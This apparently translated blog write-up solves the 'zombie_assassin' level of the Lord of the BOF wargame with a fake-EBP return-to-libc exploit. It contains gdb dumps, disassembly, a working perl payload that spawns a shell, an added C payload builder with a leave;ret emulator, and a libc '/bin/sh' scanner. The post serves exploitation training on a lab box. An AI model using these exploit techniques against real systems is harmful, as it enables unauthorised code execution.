Oh my god, fake EBP.. you are like twins with FPO, omg why
References:
http://sangu1ne.tistory.com/9 <<- Sanguine's blog, the writeup here is awesome! Not just the writeup, the whole blog is great
http://1tchy.tistory.com/entry/fake-ebp <<- cool hacker 1tchy's blog! The writeup here is awesome too!
It's an honor to be living among people like these..
&&... cd80 haha thx thx thx
My search history got wiped and all my pinned tabs went with it.. ugh.. I can't post any more, but Chrome, please raise the recent-tabs limit..
[assassin@localhost assassin]$ ls
zombie_assassin zombie_assassin.c
[assassin@localhost assassin]$ cat zombie_assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "\x90"x48'`
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) x/40wx $esp-40
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090 // fake(?)
0xbffffad8: 0x90909090 0x90909090 0x00000002 0xbffffb24
0xbffffae8: 0xbffffb30 0x40013868 0x00000002 0x08048390
0xbffffaf8: 0x00000000 0x080483b1 0x08048440 0x00000002
0xbffffb08: 0xbffffb24 0x080482e4 0x0804851c 0x4000ae60
0xbffffb18: 0xbffffb1c 0x40013e90 0x00000002 0xbffffc16
0xbffffb28: 0xbffffc28 0x00000000 0xbffffc59 0xbffffc6c
0xbffffb38: 0xbffffc84 0xbffffca3 0xbffffcc5 0xbffffcd3
0xbffffb48: 0xbffffe96 0xbffffeb5 0xbffffed3 0xbffffee8
(gdb) x/40wx $esp-80
0xbffffa90: 0x40106980 0x0804857e 0xbffffab0 0x401081ec
0xbffffaa0: 0xbffffad8 0x080484dc 0x0804857e 0xbffffab0
0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x00000002 0xbffffb24 0xbffffb30 0x40013868
0xbffffaf0: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffb00: 0x08048440 0x00000002 0xbffffb24 0x080482e4
0xbffffb10: 0x0804851c 0x4000ae60 0xbffffb1c 0x40013e90
0xbffffb20: 0x00000002 0xbffffc16 0xbffffc28 0x00000000
(gdb) q
[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]
bash2: buffer[system: command not found
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
[assassin@localhost assassin]$ clear
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048446
(gdb) r
Starting program: /home/assassin/newbie_assassin
Breakpoint 1, 0x8048446 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
End of assembler dump.
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$ my-pass
euid = 516
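Here is an added example (mine, not from the original post, the referenced blogs or the LOB sources) that spells out what the one-line payload note above and the final command actually do. It builds the 48-byte payload from the addresses recorded in this log (buffer 0xbffffab0 from the core dump, system 0x40058ae0 from gdb, "/bin/sh" at 0x400fbff9, the leave;ret at main+159), applies the binary's argv[1][47] filter, and then steps through the two leave;ret sequences on a small model of the stack so you can see why system() ends up with &"/bin/sh" as its argument. The emulator, its helper names and the 64-byte memory window are my own constructions. One caveat a practitioner will want: every address here comes from a single run with no ASLR, and the buffer address in particular moves whenever the environment or argv changes (a nested shell exporting different variables is enough), which is the usual reason a fixed-address payload like this works in one session and not another.

```c
/* Added example: FEBP payload builder plus a tiny leave;ret emulator.
 * Not from the original post; addresses are the ones in the writeup's log. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_ADDR    0xbffffab0u  /* &buffer: esp after the crashing ret, minus 0x30 */
#define SYSTEM_ADDR 0x40058ae0u  /* gdb: p system */
#define BINSH_ADDR  0x400fbff9u  /* "/bin/sh" inside libc (what foo.c finds) */
#define LEAVE_RET   0x080484dfu  /* main+159: leave ; ret */
#define PAYLOAD_LEN 48           /* buffer[40] + SFP + RET, the strncpy limit */

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* zombie_assassin rejects argv[1][47] == 0xbf (stack) and 0x40 (libc), so the
 * saved return address must have the top byte of something in the binary itself. */
int ret_allowed(uint32_t ret) {
    uint8_t top = (uint8_t)(ret >> 24);
    return top != 0xbf && top != 0x40;
}

/* Layout, matching the shell note in the writeup:
 *   buffer[0..3]   dummy      (popped into ebp by the gadget's leave)
 *   buffer[4..7]   system     (popped into eip by the gadget's ret)
 *   buffer[8..11]  dummy      (system's return address)
 *   buffer[12..15] &"/bin/sh" (system's argument)
 *   buffer[16..39] 0x90 filler
 *   [40..43]       SFP = &buffer   (the fake EBP)
 *   [44..47]       RET = leave;ret gadget */
int build_payload(uint8_t out[PAYLOAD_LEN]) {
    if (!ret_allowed(LEAVE_RET)) return -1;
    memset(out, 0x90, PAYLOAD_LEN);
    memcpy(out, "AAAA", 4);
    put32(out + 4, SYSTEM_ADDR);
    memcpy(out + 8, "BBBB", 4);
    put32(out + 12, BINSH_ADDR);
    put32(out + 40, BUF_ADDR);
    put32(out + 44, LEAVE_RET);
    return 0;
}

/* A 64-byte window of stack memory modelled at BUF_ADDR (my construction),
 * plus the three registers the chain touches. */
#define MEM_SIZE 64
struct cpu { uint32_t esp, ebp, eip; };

static uint32_t rd(const uint8_t *mem, uint32_t addr) {
    return get32(mem + (addr - BUF_ADDR));
}

/* leave: mov %ebp,%esp ; pop %ebp      ret: pop %eip */
static void leave_ret(struct cpu *c, const uint8_t *mem) {
    c->esp = c->ebp;
    c->ebp = rd(mem, c->esp); c->esp += 4;
    c->eip = rd(mem, c->esp); c->esp += 4;
}

/* Start at main's epilogue, where ebp points at the SFP slot (buffer+40).
 * Returns the eip the chain lands on; *arg is what system() reads at [esp+4]. */
uint32_t run_chain(const uint8_t payload[PAYLOAD_LEN], uint32_t *arg) {
    uint8_t mem[MEM_SIZE] = {0};
    memcpy(mem, payload, PAYLOAD_LEN);        /* the strncpy'd copy in buffer */
    struct cpu c = { BUF_ADDR + 40, BUF_ADDR + 40, 0 };
    leave_ret(&c, mem);  /* main's leave;ret: ebp = &buffer (fake), eip = gadget */
    leave_ret(&c, mem);  /* gadget: esp = &buffer, pop "AAAA", ret into system */
    *arg = rd(mem, c.esp + 4);
    return c.eip;
}

int main(void) {
    uint8_t p[PAYLOAD_LEN];
    uint32_t arg;
    if (build_payload(p) != 0) return 1;
    uint32_t eip = run_chain(p, &arg);
    printf("eip = 0x%08x, system() arg = 0x%08x\n", eip, arg);
    for (int i = 0; i < PAYLOAD_LEN; i++) printf("\\x%02x", p[i]);
    putchar('\n');
    return 0;
}
```

Run stand-alone it prints the payload as `\xNN` escapes, which is the same byte string the perl one-liner above produces. The NOP filler in buffer[16..39] is never executed; it only pads the frame so SFP and RET land at offsets 40 and 44, and the fake EBP has to point exactly at buffer[0] because the second leave sets esp from it with no slack.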
One weird thing though: while messing something up I had blindly launched a bunch of bash2, so ps showed about 3 bash2 running, and then the attack wouldn't work (I tried it from another session and it worked there, but not in the one I was using). So I exited all the way back to bash, ran bash2 again, and then it worked. Why is that?
Also, a while ago I found some source that searches libc for the /bin/sh string and used it here.. I probably bookmarked the site, so I'll look for it. This time I wanted to redo everything from scratch, so I wiped both the sources and the logs and can't find it.. dang
Anyway, ugh.. this is hard! Two stages left! I'm hungry! It's 2 AM!!! Let's go
+) Turns out the logs weren't wiped. Please praise the clever bunny. But there's no need to post them again, so I'll only post the /bin/sh-finder source.
-The source-
[assassin@localhost assassin]$ cat foo.c
#include <stdio.h>
#include <string.h>

/* Walk the mapped libc image looking for the string "/bin/sh".
 * 0x4002c000 is where libc is mapped on the LOB box (no ASLR), so the
 * scan starts there; the pointer is cast explicitly instead of being
 * assigned from an int. */
int main(void){
    char *p = (char *)0x4002c000;
    while (1) {
        /* advance to the next '/' and compare from there; if the string
         * is never found the scan runs off the mapping and segfaults */
        while (*p++ != '/') ;
        if (strcmp(p-1, "/bin/sh") == 0) {
            printf("0x%08x\n", (unsigned int)(p-1));
            return 0;
        }
    }
}
Source: found at <http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>.